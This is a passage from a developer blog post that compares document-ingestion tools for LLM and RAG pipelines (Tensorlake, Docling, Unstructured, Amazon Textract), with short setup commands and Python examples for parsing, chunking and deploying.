&lt;span class="nd"&gt;@application&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tags&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;type&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;example&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;use_case&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;city_guide&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;})&lt;/span&gt;
&lt;span class="nd"&gt;@function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;description&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Creates a simple city guide&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;secrets&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;OPENAI_API_KEY&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;
    &lt;span class="n"&gt;image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;FUNCTION_CONTAINER_IMAGE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;city_guide_app&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;city&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;agent&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;Agent&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
        &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Guide Creator&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;instructions&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Make a friendly city guide that includes the current temperature&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;tools&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;get_weather_tool&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;
    &lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;Runner&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;run_sync&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;agent&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;City: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;city&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;final_output&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;city&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Paris&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;OPENAI_API_KEY&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Error: OPENAI_API_KEY is not set&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="nc"&gt;SystemExit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="n"&gt;request&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;run_local_application&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;city_guide_app&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;city&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;output&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The code above creates a city guide application using OpenAI Agents with tool calls. I won't walk through it line by line here, as that would make this post unnecessarily long.&lt;/p&gt;

&lt;p&gt;You can find the explanation for this code in their &lt;a href="https://github.com/tensorlakeai/tensorlake#agentic-applications-quickstart" rel="noopener noreferrer"&gt;GitHub README&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Deploying and running on Tensorlake Cloud
&lt;/h3&gt;

&lt;p&gt;To run the application on Tensorlake Cloud, it first needs to be deployed.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Set &lt;code&gt;TENSORLAKE_API_KEY&lt;/code&gt; in your shell session:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;TENSORLAKE_API_KEY&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"Paste your API key here"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Set &lt;code&gt;OPENAI_API_KEY&lt;/code&gt; in your Tensorlake Secrets so that your application can make calls to OpenAI:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;tensorlake secrets &lt;span class="nb"&gt;set &lt;/span&gt;OPENAI_API_KEY &lt;span class="s2"&gt;"Paste your API key here"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Deploy the application to Tensorlake Cloud:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;tensorlake deploy examples/readme_example/city_guide.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Run the remote test script found in &lt;code&gt;examples/readme_example/test_remote_app.py&lt;/code&gt;:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;tensorlake.applications&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;run_remote_application&lt;/span&gt;

&lt;span class="n"&gt;city&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;San Francisco&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

&lt;span class="c1"&gt;# Run the application remotely
&lt;/span&gt;&lt;span class="n"&gt;request&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;run_remote_application&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;city_guide_app&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;city&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Request ID: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nb"&gt;id&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# Get the output
&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;output&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;The application will execute on Tensorlake Cloud, with each function running in its own isolated sandbox.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;In short, Tensorlake takes care of spinning up containers, injecting secrets and keeping the function durable, so it can retry tool calls without you building your own queue system.&lt;/p&gt;

&lt;p&gt;Here's a quick Tensorlake document ingestion demo showing it in action on a complex document. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/bjDfakRAGBk"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  &lt;a href="https://www.docling.ai/" rel="noopener noreferrer"&gt;2. Docling&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjd78iaxshyax8eb9c62k.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjd78iaxshyax8eb9c62k.png" alt="Docling"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Docling comes from the IBM Research team, is MIT licensed (free, including for commercial use), and turns PDFs, Office docs, images, audio and more into a unified DoclingDocument format. You can then export that to markdown, HTML, DocTags or lossless JSON and plug it straight into RAG, agents or search.&lt;/p&gt;

&lt;p&gt;It runs locally and comes with strong layout and table understanding plus OCR and vision models for scanned or complex documents.&lt;/p&gt;

&lt;h3&gt;
  
  
  Features
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Multi format parsing&lt;/strong&gt; - PDF, DOCX, PPTX, XLSX, HTML, images, audio and more into one structured representation.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Advanced PDF understanding&lt;/strong&gt; - Page layout, reading order, tables, code, formulas and images handled out of the box.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Multiple export targets&lt;/strong&gt; - Export a single DoclingDocument to markdown, HTML, DocTags or structured JSON.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Local and privacy friendly&lt;/strong&gt; - Designed to run completely locally.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Gen AI integrations&lt;/strong&gt; - Hooks into LangChain, LlamaIndex, Haystack and others out of the box.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;And many more...&lt;/p&gt;

&lt;h2&gt;
  
  
  Code Example - Convert and print markdown
&lt;/h2&gt;

&lt;p&gt;The basic flow is intentionally simple: create a converter, give it a source and then decide how you want to export the result.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;docling.document_converter&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;DocumentConverter&lt;/span&gt;

&lt;span class="n"&gt;source&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;https://arxiv.org/pdf/2408.09869&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;  &lt;span class="c1"&gt;# can also be a local Path(...)
&lt;/span&gt;&lt;span class="n"&gt;converter&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;DocumentConverter&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;converter&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;convert&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;source&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;markdown&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;export_to_markdown&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;markdown&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This example shows the “one document in, one markdown document out” path you would usually slot into your indexing step.&lt;/p&gt;

&lt;p&gt;It gives you a single markdown document you can split into chunks and feed into a vector database.&lt;/p&gt;
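&lt;p&gt;A naive way to do that split, before reaching for a dedicated chunker, is to cut the markdown at its headings. This is plain Python, not part of Docling itself:&lt;/p&gt;

```python
import re

def split_by_headings(markdown: str) -> list[str]:
    """Split a markdown string into chunks, one per top- or second-level heading."""
    chunks, current = [], []
    for line in markdown.splitlines():
        # Start a new chunk whenever a "# " or "## " heading begins.
        if re.match(r"^#{1,2} ", line) and current:
            chunks.append("\n".join(current).strip())
            current = []
        current.append(line)
    if current:
        chunks.append("\n".join(current).strip())
    return chunks

doc = "# Title\nIntro text.\n## Section A\nDetails.\n## Section B\nMore details."
for chunk in split_by_headings(doc):
    print(chunk, "\n---")
```

Each chunk then carries its heading along as context, which tends to help retrieval.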

&lt;h3&gt;
  
  
  Code Example: Same idea from the CLI
&lt;/h3&gt;

&lt;p&gt;Docling also comes with a CLI. You can install it with the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pip &lt;span class="nb"&gt;install &lt;/span&gt;docling
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now, you can run it using the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Convert a PDF at a URL to markdown on stdout&lt;/span&gt;
docling https://arxiv.org/pdf/2206.01062

&lt;span class="c"&gt;# Use the GraniteDocling vision language model in the pipeline&lt;/span&gt;
docling &lt;span class="nt"&gt;--pipeline&lt;/span&gt; vlm &lt;span class="nt"&gt;--vlm-model&lt;/span&gt; granite_docling https://arxiv.org/pdf/2206.01062
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;There are more advanced use cases with many more flags you can add. For those, visit their &lt;a href="https://docling-project.github.io/docling/" rel="noopener noreferrer"&gt;documentation&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Here's a quick video by Red Hat to see it in action. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/BWxdLm1KqTU"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  &lt;a href="https://unstructured.io/" rel="noopener noreferrer"&gt;3. Unstructured&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwpi9h5jvusb3kvtoazvy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwpi9h5jvusb3kvtoazvy.png" alt="Unstructured"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Unstructured gives you an open source library plus a managed platform to turn unstructured content into structured data for LLM apps. It partitions PDFs, slides, HTML, Office files and images into a standard set of elements that downstream tools can easily consume.&lt;/p&gt;

&lt;p&gt;On top of that, the ingest layer adds connectors, chunking and embeddings so you can build full ETL style pipelines around your document sources.&lt;/p&gt;

&lt;h3&gt;
  
  
  Features
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;One partition API:&lt;/strong&gt; autodetects the file type and routes to the right parser for you.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;LLM-friendly outputs:&lt;/strong&gt; structured elements with text, metadata and coordinates when needed.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Source and destination connectors:&lt;/strong&gt; GitHub, S3 and more via the Ingest CLI and Python library.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hosted Partition Endpoint:&lt;/strong&gt; offloads compute to their API when you want better models or scale.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2jx8voz5sfd0nevfv399.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2jx8voz5sfd0nevfv399.png" alt="Unstructured - Designed to scale"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Code Example: Quickstart with &lt;code&gt;partition&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;This is the core pattern you will see in most examples, and it is enough to plug into a RAG pipeline.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;unstructured.partition.auto&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;partition&lt;/span&gt;

&lt;span class="c1"&gt;# Read and partition a document
&lt;/span&gt;&lt;span class="n"&gt;elements&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;partition&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;example-docs/layout-parser-paper.pdf&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# Inspect a few elements
&lt;/span&gt;&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;el&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;elements&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;repr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;el&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;category&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;el&lt;/span&gt;&lt;span class="p"&gt;)[:&lt;/span&gt;&lt;span class="mi"&gt;80&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;...&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You end up with a list of elements that know their category, which makes it easy to filter for titles, paragraphs or tables before further processing.&lt;/p&gt;
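&lt;p&gt;That filtering can be as simple as a list comprehension over the category attribute. The elements below are stand-ins so the snippet is self-contained; real Unstructured elements expose the same attribute, as the quickstart above shows:&lt;/p&gt;

```python
from dataclasses import dataclass

# Stand-in for Unstructured's element objects, which carry a .category attribute.
@dataclass
class Element:
    category: str
    text: str

elements = [
    Element("Title", "LayoutParser: A Unified Toolkit"),
    Element("NarrativeText", "Recent advances in document image analysis..."),
    Element("Table", "Model | Accuracy"),
]

# Keep only the narrative paragraphs, e.g. for downstream embedding.
paragraphs = [el.text for el in elements if el.category == "NarrativeText"]
print(paragraphs)
```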

&lt;h3&gt;
  
  
  Code Example: Batch processing with Ingest CLI
&lt;/h3&gt;

&lt;p&gt;For real projects, you usually need to process many files at once and save the outputs somewhere. Unstructured's ingest CLI is built for exactly that.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Chunk and partition an entire folder of files&lt;/span&gt;
unstructured-ingest &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nb"&gt;local&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--input-path&lt;/span&gt; &lt;span class="nv"&gt;$LOCAL_FILE_INPUT_DIR&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--output-dir&lt;/span&gt; &lt;span class="nv"&gt;$LOCAL_FILE_OUTPUT_DIR&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--chunking-strategy&lt;/span&gt; by_title &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--chunk-max-characters&lt;/span&gt; 1024 &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--partition-by-api&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--api-key&lt;/span&gt; &lt;span class="nv"&gt;$UNSTRUCTURED_API_KEY&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--partition-endpoint&lt;/span&gt; &lt;span class="nv"&gt;$UNSTRUCTURED_API_URL&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--strategy&lt;/span&gt; hi_res
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This runs a full pipeline that reads documents from &lt;code&gt;LOCAL_FILE_INPUT_DIR&lt;/code&gt;, partitions them with the &lt;code&gt;hi_res&lt;/code&gt; strategy, chunks them by title and writes the structured outputs into your output directory. From there, you can index or analyze them however you like.&lt;/p&gt;

&lt;p&gt;Here's a quick API quickstart to get an idea. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/0EogKNU_BPU"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  &lt;a href="https://aws.amazon.com/textract/" rel="noopener noreferrer"&gt;4. Amazon Textract&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F23tu7ng9io04tkan6z4k.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F23tu7ng9io04tkan6z4k.png" alt="Amazon Textract"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Amazon Textract is AWS’s managed OCR and document analysis service that pulls text, handwriting, layout and structured data out of scanned documents and PDFs.&lt;/p&gt;

&lt;p&gt;It runs inside your AWS account, plugs into services like S3, Lambda, SNS and SQS, and is used at scale by companies like Paytm for document workflows.&lt;/p&gt;

&lt;h3&gt;
  
  
  Features
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Structured extraction&lt;/strong&gt; - pulls data from tables, forms and key-value pairs, not just plain text.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layout and handwriting support&lt;/strong&gt; - detects paragraphs, titles, layout elements and handwritten text in scans.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AWS integration&lt;/strong&gt; - works naturally with S3, Lambda, SNS, SQS and other AWS services.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Sync and async APIs&lt;/strong&gt; - low-latency calls for single pages plus batch jobs for large multipage docs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Security and compliance&lt;/strong&gt; - encryption, IAM and regional controls for regulated workloads.&lt;/li&gt;
&lt;/ul&gt;
